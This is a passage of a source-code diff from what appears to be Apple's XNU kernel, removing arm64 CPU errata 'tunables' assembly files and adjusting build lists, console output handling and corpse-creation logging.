CPU_VERSION_B0, $0, $1 - - // Disable downstream fill bypass logic - // [Tunable] Skye - L2E fill bypass collision from both pipes to ecore - HID_SET_BITS ARM64_REG_EHID5, ARM64_REG_EHID5_DisFillByp, $1 - - // Disable forwarding of return addresses to the NFP - // Skye: FED incorrectly taking illegal va exception - HID_SET_BITS ARM64_REG_EHID0, ARM64_REG_EHID0_nfpRetFwdDisb, $1 - - EXEC_END - - EXEC_COREALL_REVLO CPU_VERSION_B0, $0, $1 - - // Disable clock divider gating - // [Tunable/Errata][cpu_1p_1e] [CPGV2] ACC power down issue when link FSM switches from GO_DN to CANCEL and at the same time upStreamDrain request is set. 
- HID_SET_BITS ARM64_REG_HID6, ARM64_REG_HID6_DisClkDivGating, $1 - - // Disable clock dithering - // [Tunable] Skye A0: Linux: LLC PIO Errors - HID_SET_BITS ARM64_REG_ACC_OVRD, ARM64_REG_ACC_OVRD_dsblClkDtr, $1 - HID_SET_BITS ARM64_REG_ACC_EBLK_OVRD, ARM64_REG_ACC_OVRD_dsblClkDtr, $1 - - EXEC_END - - EXEC_COREALL_REVHS CPU_VERSION_B0, $0, $1 - // : Disable refcount syncing between E and P - HID_INSERT_BITS ARM64_REG_CYC_OVRD, ARM64_REG_CYC_OVRD_dsblSnoopTime_mask, ARM64_REG_CYC_OVRD_dsblSnoopPTime, $1 - EXEC_END -.endmacro \ No newline at end of file diff --git a/osfmk/arm64/tunables/tunables_h11.s b/osfmk/arm64/tunables/tunables_h11.s deleted file mode 100644 index 9fb5b0d9c..000000000 --- a/osfmk/arm64/tunables/tunables_h11.s +++ /dev/null @@ -1,80 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 
- * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES - /***** Tunables that apply to all cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all P cores, all revisions *****/ - EXEC_PCORE_REVALL $0, $1 - // rdar://problem/34435356: segfaults due to IEX clock-gating - HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_rccForceAllIexL3ClksOn, $1 - - // Prevent ordered loads from being dispatched from LSU until all prior loads have completed. - // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations - HID_SET_BITS ARM64_REG_HID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1 - - // rdar://problem/38482968: [Cyprus Tunable] Poisoned cache line crossing younger load is not redirected by older load-barrier - HID_SET_BITS ARM64_REG_HID3, ARM64_REG_HID3_DisColorOpt, $1 - - // rdar://problem/41056604: disable faster launches of uncacheable unaligned stores to workaround load/load ordering violation - HID_SET_BITS ARM64_REG_HID11, ARM64_REG_HID11_DisX64NTLnchOpt, $1 - - EXEC_END - - /***** Tunables that apply to all E cores, all revisions *****/ - EXEC_ECORE_REVALL $0, $1 - // Prevent ordered loads from being dispatched from LSU until all prior loads have completed. 
- // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations - HID_SET_BITS ARM64_REG_EHID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1 - - // rdar://problem/36595004: Poisoned younger load is not redirected by older load-acquire - HID_SET_BITS ARM64_REG_EHID3, ARM64_REG_EHID3_DisColorOpt, $1 - - // rdar://problem/37949166: Disable the extension of prefetcher training pipe clock gating, revert to default gating - HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_rccDisPwrSavePrfClkOff, $1 - - EXEC_END - - /***** Tunables that apply to specific cores, all revisions *****/ - // Should be applied to all Aruba variants, but only Cyprus variants B0 and later - EXEC_COREEQ_REVALL MIDR_ARUBA_VORTEX, $0, $1 - // rdar://problem/36716477: data corruption due to incorrect branch predictor resolution - HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_enaBrKillLimit, $1 - EXEC_END - - /***** Tunables that apply to specific cores and revisions *****/ - EXEC_COREEQ_REVHS MIDR_CYPRUS_VORTEX, CPU_VERSION_A1, $0, $1 - // rdar://problem/36716477: data corruption due to incorrect branch predictor resolution - HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_enaBrKillLimit, $1 - EXEC_END - - EXEC_COREEQ_REVEQ MIDR_ARUBA_VORTEX, CPU_VERSION_A1, $0, $1 - // rdar://problem/40695685: Enable BIF fill buffer stall logic to prevent skid buffer overflow (Aruba A1 only) - HID_SET_BITS ARM64_REG_HID5, ARM64_REG_HID5_EnableDnFIFORdStall, $1 - EXEC_END -.endmacro \ No newline at end of file diff --git a/osfmk/arm64/tunables/tunables_h12.s b/osfmk/arm64/tunables/tunables_h12.s deleted file mode 100644 index 7b988d0d1..000000000 --- a/osfmk/arm64/tunables/tunables_h12.s +++ /dev/null @@ -1,100 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. 
- * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES - /***** Tunables that apply to all cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all P cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all E cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to specific cores, all revisions *****/ - EXEC_COREEQ_REVALL MIDR_CEBU_LIGHTNING, $0, $1 - // rdar://53907283 ([Cebu ACC Errata] Sibling Merge in LLC can cause UC load to violate ARM Memory Ordering Rules.) 
- HID_SET_BITS ARM64_REG_HID5, ARM64_REG_HID5_DisFill2cMerge, $1 - - // rdar://problem/54615539: [Cebu ACC Tunable]Cross-beat Crypto(AES/PMUL) ICache fusion is not disabled for branch uncondtional recoded instruction. - HID_SET_BITS ARM64_REG_HID0, ARM64_REG_HID0_CacheFusionDisable, $1 - - // rdar://problem/50664291: [Cebu B0/B1 Tunables][PerfVerif][LSU] Post-silicon tuning of STNT widget contiguous counter threshold - HID_INSERT_BITS ARM64_REG_HID4, ARM64_REG_HID4_CnfCntrThresh_mask, ARM64_REG_HID4_CnfCntrThresh_VALUE, $1 - - // rdar://problem/47744434: Barrier Load Ordering property is not satisfied for x64-loads - HID_SET_BITS ARM64_REG_HID9, ARM64_REG_HID9_EnableFixBug47221499, $1 - - // rdar://problem/50664291: [Cebu B0/B1 Tunables][PerfVerif][LSU] Post-silicon tuning of STNT widget contiguous counter threshold - HID_SET_BITS ARM64_REG_HID9, ARM64_REG_HID9_DisSTNTWidgetForUnalign, $1 - - // rdar://problem/47865629: RF bank and Multipass conflict forward progress widget does not handle 3+ cycle livelock - HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_EnRs4Sec, $1 - HID_CLEAR_BITS ARM64_REG_HID16, ARM64_REG_HID16_DisxPickRs45, $1 - HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_EnMPxPick45, $1 - HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_EnMPCyc7, $1 - - // Prevent ordered loads from being dispatched from LSU until all prior loads have completed. 
- // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations - HID_SET_BITS ARM64_REG_HID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1 - - // rdar://problem/51690962: Disable Store-Non-Temporal downgrade widget - HID_SET_BITS ARM64_REG_HID4, ARM64_REG_HID4_DisSTNTWidget, $1 - - // rdar://problem/41056604: disable faster launches of uncacheable unaligned stores to workaround load/load ordering violation - HID_SET_BITS ARM64_REG_HID11, ARM64_REG_HID11_DisX64NTLnchOpt, $1 - - // rdar://problem/45024523: enable aggressive LEQ throttling to work around LEQ credit leak - HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_leqThrottleAggr, $1 - - // rdar://problem/41029832: configure dummy cycles to work around incorrect temp sensor readings on NEX power gating - HID_INSERT_BITS ARM64_REG_HID13, ARM64_REG_HID13_PreCyc_mask, ARM64_REG_HID13_PreCyc_VALUE, $1 - EXEC_END - - EXEC_COREEQ_REVALL MIDR_CEBU_THUNDER, $0, $1 - // rdar://53907283 ([Cebu ACC Errata] Sibling Merge in LLC can cause UC load to violate ARM Memory Ordering Rules.) - HID_SET_BITS ARM64_REG_HID5, ARM64_REG_HID5_DisFill2cMerge, $1 - - // rdar://problem/48476033: Prevent store-to-load forwarding for UC memory to avoid barrier ordering violation - HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_ForceWStDrainUc, $1 - - // Prevent ordered loads from being dispatched from LSU until all prior loads have completed. 
- // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations - HID_SET_BITS ARM64_REG_EHID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1 - - // rdar://problem/37949166: Disable the extension of prefetcher training pipe clock gating, revert to default gating - HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_rccDisPwrSavePrfClkOff, $1 - EXEC_END - - EXEC_COREEQ_REVALL MIDR_TURKS, $0, $1 - // rdar://problem/53506680: [MP_CHECKER] Load STLFs from a completed UC/NC/NT store causing barrier ordering violation - HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_ForceWStDrainUc, $1 - EXEC_END - - /***** Tunables that apply to specific cores and revisions *****/ - /* N/A */ -.endmacro \ No newline at end of file diff --git a/osfmk/arm64/tunables/tunables_h13.s b/osfmk/arm64/tunables/tunables_h13.s deleted file mode 100644 index d6c12f25b..000000000 --- a/osfmk/arm64/tunables/tunables_h13.s +++ /dev/null @@ -1,29 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. 
- * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES -.endmacro diff --git a/osfmk/arm64/tunables/tunables_h7.s b/osfmk/arm64/tunables/tunables_h7.s deleted file mode 100644 index d239bb993..000000000 --- a/osfmk/arm64/tunables/tunables_h7.s +++ /dev/null @@ -1,57 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 
- * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES - /***** Tunables that apply to all cores, all revisions *****/ - - // Disable LSP flush with context switch to work around bug in LSP - // that can cause Typhoon to wedge when CONTEXTIDR is written. - // - HID_SET_BITS ARM64_REG_HID0, ARM64_REG_HID0_LoopBuffDisb, $1 - HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_rccDisStallInactiveIexCtl, $1 - HID_SET_BITS ARM64_REG_HID3, ARM64_REG_HID3_DisXmonSnpEvictTriggerL2StarvationMode, $1 - HID_CLEAR_BITS ARM64_REG_HID5, (ARM64_REG_HID5_DisHwpLd | ARM64_REG_HID5_DisHwpSt), $1 - - // Change the default memcache data set ID from 0 to 15 for all agents - HID_SET_BITS ARM64_REG_HID8, (ARM64_REG_HID8_DataSetID0_VALUE | ARM64_REG_HID8_DataSetID1_VALUE), $1 - - /***** Tunables that apply to all P cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all E cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to specific cores, all revisions *****/ - EXEC_COREEQ_REVALL MIDR_CAPRI, $0, $1 - HID_SET_BITS ARM64_REG_HID8, ARM64_REG_HID8_DataSetID2_VALUE, $1 - EXEC_END - - /***** Tunables that apply to specific cores and revisions *****/ - /* N/A */ - - isb sy -.endmacro \ No newline at end of file diff --git a/osfmk/arm64/tunables/tunables_h8.s b/osfmk/arm64/tunables/tunables_h8.s deleted file mode 100644 index 0f2a5d7a2..000000000 --- a/osfmk/arm64/tunables/tunables_h8.s +++ /dev/null @@ -1,60 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. 
The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES - /***** Tunables that apply to all cores, all revisions *****/ - HID_CLEAR_BITS ARM64_REG_HID11, ARM64_REG_HID11_DisFillC1BubOpt, $1 - - // Change the default memcache data set ID from 0 to 15 for all agents - HID_SET_BITS ARM64_REG_HID8, (ARM64_REG_HID8_DataSetID0_VALUE | ARM64_REG_HID8_DataSetID1_VALUE), $1 - HID_SET_BITS ARM64_REG_HID8, (ARM64_REG_HID8_DataSetID2_VALUE | ARM64_REG_HID8_DataSetID3_VALUE), $1 - - // Use 4-cycle MUL latency to avoid denormal stalls - HID_SET_BITS ARM64_REG_HID7, ARM64_REG_HID7_disNexFastFmul, $1 - - // disable reporting of TLB-multi-hit-error - // - HID_CLEAR_BITS ARM64_REG_LSU_ERR_STS, ARM64_REG_LSU_ERR_STS_L1DTlbMultiHitEN, $1 - - /***** Tunables that apply to all P cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all E cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to specific cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to specific cores and revisions *****/ - - // 
rdar://problem/36112905: Set CYC_CFG:skipInit to pull in isAlive by one DCLK - // to work around potential hang. Must only be applied to Maui C0. - EXEC_COREEQ_REVEQ MIDR_MAUI, CPU_VERSION_C0, $0, $1 - HID_SET_BITS ARM64_REG_CYC_CFG, ARM64_REG_CYC_CFG_skipInit, $1 - EXEC_END - isb sy -.endmacro \ No newline at end of file diff --git a/osfmk/arm64/tunables/tunables_h9.s b/osfmk/arm64/tunables/tunables_h9.s deleted file mode 100644 index c44e91c77..000000000 --- a/osfmk/arm64/tunables/tunables_h9.s +++ /dev/null @@ -1,61 +0,0 @@ -/* - * Copyright (c) 2019 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. 
- * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -.macro APPLY_TUNABLES - /***** Tunables that apply to all cores, all revisions *****/ - - // IC prefetch configuration - // - HID_INSERT_BITS ARM64_REG_HID0, ARM64_REG_HID0_ICPrefDepth_bmsk, ARM64_REG_HID0_ICPrefDepth_VALUE, $1 - HID_SET_BITS ARM64_REG_HID0, ARM64_REG_HID0_ICPrefLimitOneBrn, $1 - - // disable reporting of TLB-multi-hit-error - // - HID_CLEAR_BITS ARM64_REG_LSU_ERR_CTL, ARM64_REG_LSU_ERR_CTL_L1DTlbMultiHitEN, $1 - - // disable crypto fusion across decode groups - // - HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_disAESFuseAcrossGrp, $1 - - /***** Tunables that apply to all P cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to all E cores, all revisions *****/ - /* N/A */ - - /***** Tunables that apply to specific cores, all revisions *****/ - EXEC_COREEQ_REVALL MIDR_MYST, $0, $1 - // Clear DisDcZvaCmdOnly - // Per Myst A0/B0 tunables document - // Myst: Confirm ACC Per-CPU Tunables - HID_CLEAR_BITS ARM64_REG_HID3, ARM64_REG_HID3_DisDcZvaCmdOnly, $1 - HID_CLEAR_BITS ARM64_REG_EHID3, ARM64_REG_HID3_DisDcZvaCmdOnly, $1 - EXEC_END - - /***** Tunables that apply to specific cores and revisions *****/ - /* N/A */ -.endmacro \ No newline at end of file diff --git a/osfmk/conf/Makefile.template b/osfmk/conf/Makefile.template index bdf7fe02e..a09b5d2c3 100644 --- a/osfmk/conf/Makefile.template +++ b/osfmk/conf/Makefile.template @@ -132,7 +132,6 @@ uat.o_CFLAGS_ADD += -Wno-implicit-int-conversion video_console.o_CFLAGS_ADD += -Wno-implicit-int-conversion xcpm_dvfs.o_CFLAGS_ADD += -Wno-implicit-int-conversion xcpm_ioctl.o_CFLAGS_ADD += -Wno-implicit-int-conversion -zalloc.o_CFLAGS_ADD += -Wno-implicit-int-conversion # -Wno-shorten-64-to-32 arm_vm_init.o_CFLAGS_ADD += -Wno-shorten-64-to-32 backtrace.o_CFLAGS_ADD += -Wno-shorten-64-to-32 @@ -166,7 +165,6 @@ vm_object.o_CFLAGS_ADD += -Wno-shorten-64-to-32 vm_shared_region_pager.o_CFLAGS_ADD += -Wno-shorten-64-to-32 
vm_swapfile_pager.o_CFLAGS_ADD += -Wno-shorten-64-to-32 vm_user.o_CFLAGS_ADD += -Wno-shorten-64-to-32 -zalloc.o_CFLAGS_ADD += -Wno-shorten-64-to-32 # -Wno-sign-conversion Diagnostics.o_CFLAGS_ADD += -Wno-sign-conversion acpi.o_CFLAGS_ADD += -Wno-sign-conversion @@ -368,8 +366,6 @@ xcpm_dvfs.o_CFLAGS_ADD += -Wno-sign-conversion xcpm_fi.o_CFLAGS_ADD += -Wno-sign-conversion xcpm_idle.o_CFLAGS_ADD += -Wno-sign-conversion xcpm_ioctl.o_CFLAGS_ADD += -Wno-sign-conversion -zalloc.o_CFLAGS_ADD += -Wno-sign-conversion -zcache.o_CFLAGS_ADD += -Wno-sign-conversion # Rebuild if per-file overrides change ${OBJS}: $(firstword $(MAKEFILE_LIST)) diff --git a/osfmk/conf/files b/osfmk/conf/files index 991216abd..a7e18d895 100644 --- a/osfmk/conf/files +++ b/osfmk/conf/files @@ -49,7 +49,6 @@ OPTIONS/mach_vm_debug optional mach_vm_debug OPTIONS/mach_page_hash_stats optional mach_page_hash_stats OPTIONS/mig_debug optional mig_debug OPTIONS/vm_cpm optional vm_cpm -OPTIONS/task_swapper optional task_swapper OPTIONS/stack_usage optional stack_usage OPTIONS/importance_inheritance optional importance_inheritance OPTIONS/importance_debug optional importance_debug @@ -79,8 +78,8 @@ OPTIONS/config_quiesce_counter optional config_quiesce_counter # # UserNotification files # -./UserNotification/UNDRequest.c standard -./UserNotification/UNDReplyServer.c standard +./UserNotification/UNDRequest.c optional config_user_notification +./UserNotification/UNDReplyServer.c optional config_user_notification osfmk/UserNotification/KUNCUserNotifications.c standard osfmk/kdp/kdp.c optional config_kdp_interactive_debugging @@ -120,7 +119,7 @@ osfmk/kern/build_config.c standard osfmk/kern/clock.c standard osfmk/kern/clock_oldops.c standard osfmk/kern/coalition.c optional config_coalitions -osfmk/kern/counters.c standard +osfmk/kern/counter_common.c standard osfmk/kern/cpu_quiesce.c optional config_quiesce_counter osfmk/kern/debug.c standard osfmk/kern/ecc_logging.c optional config_ecc_logging @@ -175,7 +174,6 
@@ osfmk/kern/syscall_sw.c standard osfmk/kern/sysdiagnose.c optional config_sysdiagnose osfmk/kern/task.c standard osfmk/kern/task_policy.c standard -osfmk/kern/task_swap.c standard osfmk/kern/test_lock.c optional development osfmk/kern/test_lock.c optional debug osfmk/kern/test_mpsc_queue.c optional development @@ -192,7 +190,6 @@ osfmk/kern/ux_handler.c standard osfmk/kern/waitq.c standard osfmk/kern/work_interval.c standard osfmk/kern/zalloc.c standard -osfmk/kern/zcache.c optional config_zcache osfmk/kern/gzalloc.c optional config_gzalloc osfmk/kern/bsd_kern.c optional mach_bsd osfmk/kern/hibernate.c optional hibernation @@ -200,6 +197,7 @@ osfmk/kern/remote_time.c standard osfmk/kern/memset_s.c standard osfmk/kern/copyout_shim.c optional copyout_shim osfmk/kern/suid_cred.c standard +osfmk/kern/task_ident.c standard ./mach/clock_server.c standard ./mach/clock_priv_server.c standard @@ -250,6 +248,7 @@ osfmk/voucher/ipc_pthread_priority.c standard ./mach/fairplayd_notification_user.c optional config_arcade ./mach/arcade_upcall_user.c optional config_arcade ./mach/arcade_register_server.c optional config_arcade +./mach/iocompressionstats_notification_user.c optional config_io_compression_stats # # For now, no external pagers diff --git a/osfmk/conf/files.arm b/osfmk/conf/files.arm index 74181f5e9..1d0f04be6 100644 --- a/osfmk/conf/files.arm +++ b/osfmk/conf/files.arm @@ -53,6 +53,7 @@ osfmk/arm/trustcache.c standard osfmk/arm/model_dep.c standard osfmk/arm/pcb.c standard osfmk/arm/rtclock.c standard +osfmk/arm/counter.c standard osfmk/arm/status.c standard osfmk/arm/status_shared.c standard osfmk/arm/trap.c standard diff --git a/osfmk/conf/files.arm64 b/osfmk/conf/files.arm64 index b8f235bdb..266a05ca1 100644 --- a/osfmk/conf/files.arm64 +++ b/osfmk/conf/files.arm64 @@ -96,3 +96,5 @@ osfmk/arm64/pgtrace.c standard osfmk/arm64/pgtrace_decoder.c optional config_pgtrace_nonkext osfmk/arm64/machine_remote_time.c optional config_mach_bridge_recv_time 
osfmk/arm64/corecrypto/sha256_compress_arm64.s standard + +osfmk/arm/counter.c standard diff --git a/osfmk/conf/files.x86_64 b/osfmk/conf/files.x86_64 index 5393a8cd6..37136bd63 100644 --- a/osfmk/conf/files.x86_64 +++ b/osfmk/conf/files.x86_64 @@ -94,8 +94,10 @@ osfmk/i386/ucode.c standard osfmk/i386/vmx/vmx_cpu.c optional config_vmx osfmk/i386/vmx/vmx_shims.c optional config_vmx +osfmk/i386/x86_hypercall.c optional development osfmk/kern/hv_support_kext.c optional hypervisor +osfmk/kern/hv_io_notifier.c optional hypervisor # DUMMIES TO FORCE GENERATION OF .h FILES #osfmk/OPTIONS/ln optional ln @@ -114,3 +116,4 @@ osfmk/x86_64/idt64.s standard osfmk/i386/panic_hooks.c standard osfmk/i386/panic_notify.c standard osfmk/x86_64/machine_remote_time.c optional config_mach_bridge_send_time +osfmk/x86_64/counter.c standard diff --git a/osfmk/console/serial_console.c b/osfmk/console/serial_console.c index 586562011..980a7810d 100644 --- a/osfmk/console/serial_console.c +++ b/osfmk/console/serial_console.c @@ -317,7 +317,15 @@ get_cons_ops_index(void) static inline void _cnputs(char * c, int size) { - uint32_t idx = get_cons_ops_index(); + extern int disableConsoleOutput; + + if (disableConsoleOutput) { + return; + } + + assert(c != NULL); + + const uint32_t idx = get_cons_ops_index(); while (size-- > 0) { if (*c == '\n') { diff --git a/osfmk/console/serial_general.c b/osfmk/console/serial_general.c index 62bde9741..34ba2b4e4 100644 --- a/osfmk/console/serial_general.c +++ b/osfmk/console/serial_general.c @@ -113,8 +113,13 @@ switch_to_video_console(void) int switch_to_serial_console(void) { + extern bool serial_console_enabled; int old_cons_ops = cons_ops_index; - cons_ops_index = SERIAL_CONS_OPS; + + if (serial_console_enabled) { + cons_ops_index = SERIAL_CONS_OPS; + } + return old_cons_ops; } diff --git a/osfmk/corpses/corpse.c b/osfmk/corpses/corpse.c index d440c79bd..fcb67e202 100644 --- a/osfmk/corpses/corpse.c +++ b/osfmk/corpses/corpse.c @@ -130,6 +130,7 @@ #include 
#include #include +#include #if CONFIG_MACF #include @@ -218,6 +219,9 @@ total_corpses_count(void) return gate.corpses; } +extern char *proc_best_name(struct proc *); +extern int proc_pid(struct proc *); + /* * Routine: task_crashinfo_get_ref() * Grab a slot at creating a corpse. @@ -227,6 +231,7 @@ static kern_return_t task_crashinfo_get_ref(corpse_flags_t kcd_u_flags) { union corpse_creation_gate oldgate, newgate; + struct proc *p = (void *)current_proc(); assert(kcd_u_flags & CORPSE_CRASHINFO_HAS_REF); @@ -235,10 +240,14 @@ task_crashinfo_get_ref(corpse_flags_t kcd_u_flags) newgate = oldgate; if (kcd_u_flags & CORPSE_CRASHINFO_USER_FAULT) { if (newgate.user_faults++ >= TOTAL_USER_FAULTS_ALLOWED) { + os_log(OS_LOG_DEFAULT, "%s[%d] Corpse failure, too many faults %d\n", + proc_best_name(p), proc_pid(p), newgate.user_faults); return KERN_RESOURCE_SHORTAGE; } } if (newgate.corpses++ >= TOTAL_CORPSES_ALLOWED) { + os_log(OS_LOG_DEFAULT, "%s[%d] Corpse failure, too many %d\n", + proc_best_name(p), proc_pid(p), newgate.corpses); return KERN_RESOURCE_SHORTAGE; } @@ -246,6 +255,8 @@ task_crashinfo_get_ref(corpse_flags_t kcd_u_flags) if (atomic_compare_exchange_strong_explicit(&inflight_corpses, &oldgate.value, newgate.value, memory_order_relaxed, memory_order_relaxed)) { + os_log(OS_LOG_DEFAULT, "%s[%d] Corpse allowed %d of %d\n", + proc_best_name(p), proc_pid(p), newgate.corpses, TOTAL_CORPSES_ALLOWED); return KERN_SUCCESS; } } @@ -277,6 +288,7 @@ task_crashinfo_release_ref(corpse_flags_t kcd_u_flags) if (atomic_compare_exchange_strong_explicit(&inflight_corpses, &oldgate.value, newgate.value, memory_order_relaxed, memory_order_relaxed)) { + os_log(OS_LOG_DEFAULT, "Corpse released, count at %d\n", newgate.corpses); return KERN_SUCCESS; } } @@ -653,7 +665,7 @@ error_task_generate_corpse: /* Terminate all the other 